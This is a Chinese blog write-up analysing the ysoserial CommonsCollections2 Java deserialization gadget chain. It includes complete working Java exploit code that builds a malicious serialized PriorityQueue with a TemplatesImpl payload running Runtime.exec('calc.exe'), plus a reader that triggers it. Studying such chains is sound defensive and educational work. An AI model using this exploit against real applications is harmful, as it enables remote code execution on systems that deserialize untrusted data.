java反序列化 exp_java反序列化-ysoserial-调试分析总结篇(2)

前言:

这篇主要分析commonCollections2,调用链如下图所示:

b6a551fde4c1d4298e52e3c847e39c11.png

调用链分析:

分析环境:jdk1.8.0

1fa92b3d5bd5241b2f4b0acf8f796cfc.png

反序列化的入口点为src.zip!/java/util/PriorityQueue.java

38d7cdeb7de606cd591e617084832732.png

此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类

2a85f753c3f5e831d72fe9e9fe87b29d.png

接下来调用siftDownUsingComparator函数

01382357e034ccc6dcbc120d7cc9d23e.png

在这里将调用TransformingComparator的compare函数,在这里就到了新的漏洞触发点,this.transformer.transform(),而这里的this.transformer即为invokerTransformer,

在commoncollections1中第一次调用的是Lazymap的this.factory.transform,而这里是priorityQueue.java的compare里的this.transformer.transform

211ebe8277360aecc226092abe226a76.png

f1299aa675c7c14a51c865e58966578d.png

而invokeTransformer中将反射调用,templatesImple的newTranformer方法,以前分析fastjson1.2.24时候也用的是这个内置的TemplatesImple类,其有getoutputProperties也将调用newTransformer()

1627d6c5f234129d4d70947eab31f18b.png

1adc6ed62d46cee3dc366f555d380dac.png

接着套路思路就是在newTransformer中实例化我们的恶意字节码中包含的类,从而调用其static代码块或者构造方法中的rce代码

ad7462693d38feb939fac705c1881b2c.png

ece259a74dbe8cd9d316b7442ed5a179.png

ysoserial-exp构造

分析完调用链以后看看ysoserial是如何构造payload的

fa4650ebe6253e98e4ca0f45c9aeb4f3.png

首先创建TemplatesImpl实例

9dadf84616ecfb814f92c73751307f52.png

Class.forName加载三个需要用到的类,然后调用重载的TemplatesImpl来创建实例,这里用到的技术是javassist操作类的字节码

aad477cb9d874f05a6ce3cbc77735410.png

接下来要对我们_bytecode字段所要存储的恶意字节码类进行操作,这里首先将两个类放到pool中

bc86108eeec7fdade12ca85dd711dda8.png

bcf9c7cbdb844f243383cb5190a06d58.png

其中SubTransletpaylod就是存放rce代码的类

2d08c816178040f2076fb0b8f2be7b6d.png

接下来从pool中取出要操作的类,来操作其字节码

c5eb2ab74e4cf67c33727ce1e0e8437c.png

接下来该类创建static代码块,并且加入rce的代码,这里的代码可以自定义,读写文件也可以

d8f7e82a4c2e22458ce7d5033340ef84.png

然后给该类重新设置名字,其实这个可以省略,接下来给该类设置父类为tranlet,其实这里也可以不设置,payload类里已经设置好了

dc0159ef8b0f5ff24378f39ad0582b6f.png

之后将rce类的字节码放到_bytecodes属性中,再设置其他依赖属性_name和_tfactory即可返回templatesImpl类

352e6dca65d6d612d07744db5190b96d.png

接着定义需要反射调用的方法,这里首先用tostring进行填充,后面再放入newtransformer,声明要反序列化的队列priorityQueue,容量为2

e182e1c380607895b04806afd06100de.png

然后反射设置invoketransformer的方法为newtransformer来替换原来的tostring,然后再将queue中的两个元素替换成templatesImpl类的实例,从而结束整个构造过程,因此构造分为三步

1.构造用于执行rce的类

2.构造templatesImpl类的实例,将1中的类填充

3.将2中的类填充到priorityqueue队列中,返回obj

手动编写exp:

exp.java

packageCommonCollections2;import javassist.*;importorg.apache.commons.collections4.Transformer;importorg.apache.commons.collections4.comparators.TransformingComparator;importorg.apache.commons.collections4.functors.InvokerTransformer;import java.io.*;importjava.lang.reflect.Field;importjava.util.Comparator;importjava.util.PriorityQueue;importcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;public classexp {public static void main(String[] args) throwsClassNotFoundException, NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException {

TemplatesImpl tmp= newTemplatesImpl();

ClassPool pool=ClassPool.getDefault();

pool.insertClassPath(new ClassClassPath(payload.class));

CtClass clazz= pool.get(payload.class.getName());final byte[] clazzByte =clazz.toBytecode();//_bytecode为private,需要设置可访问

Field _btcode = TemplatesImpl.class.getDeclaredField("_bytecodes");

_btcode.setAccessible(true);

_btcode.set(tmp,new byte[][]{clazzByte});//_name不为空即可

Field _name = TemplatesImpl.class.getDeclaredField("_name");

_name.setAccessible(true);

_name.set(tmp,"tr1ple");//_tfactory可为空

Field _tf = TemplatesImpl.class.getDeclaredField("_tfactory");

_tf.setAccessible(true);

_tf.set(tmp,null);//

//构造priorityqueue对象// PriorityQueue queue = new PriorityQueue(2);

queue.add(1);

queue.add(1);

InvokerTransformer trans= new InvokerTransformer("newTransformer",new Class[0],new Object[0]);//InvokerTransformer trans = new InvokerTransformer("getOutputProperties",new Class[0],new Object[0]); //调用该方法一样的效果//依赖collections4

TransformingComparator com = newTransformingComparator(trans);

Field ComFi= PriorityQueue.class.getDeclaredField("comparator");

ComFi.setAccessible(true);

ComFi.set(queue,com);

Field qu= PriorityQueue.class.getDeclaredField("queue");

qu.setAccessible(true);

Object[] objOutput=(Object[])qu.get(queue);

objOutput[0] =tmp;

objOutput[1] = 1;//序列化

File file;

file= new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser");

OutputStream out= newFileOutputStream(file);

ObjectOutputStream obj= newObjectOutputStream(out);

obj.writeObject(queue);

obj.close();

}

}

payload.java

packageCommonCollections2;importcom.sun.org.apache.xalan.internal.xsltc.DOM;importcom.sun.org.apache.xalan.internal.xsltc.TransletException;importcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;importcom.sun.org.apache.xml.internal.dtm.DTMAxisIterator;importcom.sun.org.apache.xml.internal.serializer.SerializationHandler;importjava.io.IOException;importjava.io.Serializable;public class payload extends AbstractTranslet implementsSerializable {

{try{

Runtime.getRuntime().exec("calc.exe");

}catch(IOException e) {

e.printStackTrace();

}

}publicpayload(){

System.out.println("tr1ple 2333");

}public void transform(DOM document, SerializationHandler[] handlers) throwsTransletException {

}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throwsTransletException {

}

}

readObj.java

packageCommonCollections2;import java.io.*;public classreadObj {public static voidmain(String[] args) {try{

FileInputStream fio= new FileInputStream(new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser"));

ObjectInputStream obj= newObjectInputStream(fio);

obj.readObject();

obj.close();

}catch(FileNotFoundException e) {

e.printStackTrace();

}catch(IOException e) {

e.printStackTrace();

}catch(ClassNotFoundException e) {

e.printStackTrace();

}

}

}

测试结果:

如下图所示,_bytecode中的类将被实例化,调用static代码块的代码和构造函数中的代码

37ca98e447d55b5c22a4c325a2d09ef7.png

总结:

整个调用链的重点是在对队列元素排序时可以自定义比较器进行转换从而触发反射调用队列元素的成员方法,相对于cc1来说构造感觉更精巧一点,这个内部TemplatesImpl类也是jdk内置的,攻击效果也不受到jdk版本影响,只要cc4.0的依赖存在即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值